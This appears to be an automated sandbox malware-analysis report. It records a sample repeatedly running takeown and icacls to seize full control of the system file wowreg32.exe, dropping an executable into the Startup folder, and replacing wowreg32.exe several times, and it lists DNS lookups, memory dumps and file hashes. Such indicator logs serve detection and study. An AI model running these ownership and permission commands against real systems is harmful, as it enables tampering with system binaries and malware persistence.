"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 27.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/4432-0-0x00007FFB88243000-0x00007FFB88245000-memory.dmp

memory/4432-1-0x00000143DF690000-0x00000143DF6B8000-memory.dmp

memory/4432-2-0x00007FFB88240000-0x00007FFB88D01000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\myriaYcFRu6.exe

MD5 fdd37962a54814f55dc56ef6e4a062af
SHA1 aa2423c8a3a207f607fd03f02538dbb557e69e3c
SHA256 142a2027b957a97f2f723b605a2e2a95586dbcc54ce3a6215b0fdb04b1d047e7
SHA512 5d4ba43c9f88c42b2321baa7dce849d1da8472ee4bba694134f4045300210ae5a8ee4b3789491f2c20b15e0e19f13ce9a3b52358256dcebbdd2dfe7117ec3ba4

memory/4432-1334-0x00007FFB88243000-0x00007FFB88245000-memory.dmp

memory/4432-1505-0x00007FFB88240000-0x00007FFB88D01000-memory.dmp

C:\Windows\System32\wowreg32.exe

MD5 ccde813d93df0efc54e4a346df173075
SHA1 d2211031e75c1b2c8499cc6320499fd97dbd5819
SHA256 e26c0e4c063a840d34212f0973816ae4bee56e92a52a0ece8c2cf765d079e1bc
SHA512 4b5ea53fabc7edf037e4b4809f68d5120a58395c27def5529af5a06d92c50b2bd98dce540a4aeceb4690b2ae2481f4857d411a42227adb087b11427f180e859d

C:\Windows\System32\wowreg32.exe

MD5 36549e81f1ad0a1fde7a0f1ce6ff37c8
SHA1 b25177a72bd9901d52bb3a2e6a0c996a7acec7aa
SHA256 7445a962f7a28a1364e87a1c01c5a4e9a60a02e9bf20945f42f80b3b8b96b99c
SHA512 47d5b15a86c99eeb09ad30db9215daccd1bf19a7562ea49328a61cb8a81269d8d5108a36fe77c7acc4774a67df0e5865166c00fc68dd2b91cb2cff2ed726d44e

C:\Windows\System32\wowreg32.exe

MD5 0a5ead827c6bb13f7252fa02872436f1
SHA1 784a3ff7a2b1a1f96d2c1b67c141e21a2ac7faa4
SHA256 6f1d6c5e3c0110e6b658f8db6938a128b6d51f89dd8e8a74e13c03e7c01b1770
SHA512 f4146c306ee5bd226bc6e60a294d19ef0a544dff9a4f27faffaa4059a9dcf05598184afef31cdb999b064c893ca484d8d6e6ebdf1e990ceeef56c6a791c440a1

C:\Windows\System32\wowreg32.exe

MD5 83cba40e6aea8cb582a53c8b772a0413
SHA1 da36f9bd8290c62c4e0dcc5d503d74618759979f
SHA256 f485d1c36ef4591406816740d211d5297bb569ce597b085419364cf469bf57de
SHA512 bee5e7340563b3e8f8954fbe4ac95b082e72a83ddbda0b42e2ea0cf0092979105da24c04ae79f283abba5cc0b39aa6d47b31431aff3ac3c869509cfc1d9dbd00

C:\Windows\System32\wowreg32.exe

MD5 a7705c19fc5518a70d1bb7cadfa74143
SHA1 8ccd866cf63cc2750b5ea922672183d6169d96f9
SHA256 3f35203bb1a9e4cbbab5d0a6155092d49b4e2d3be52e400cc08447cca646955f
SHA512 4d4a5917f32190538c25cb27aa5285078dae109eb6916dd592a2158b832209133a88b5fe77859b607f84fc25e5b47f5f7dcfa014e5753414862864628ef4f09c

C:\Windows\System32\wowreg32.exe

MD5 d11574a983488bcc2ed5803e2e0d9a63
SHA1 80548f16bfd4b21981a313f53e7e272e87042215
SHA256 efae7ffd996075719e4b562b202ca2fcd315c02e9fc9bb247bc901b48f69d619
SHA512 968df18922bb277f78247b08bbce83338659c885cd25c22294a695ca7d203a39f7a193ff480d7ee84f3b1b119b549d4896ad03432fea41d796dc5a4d3ce248c9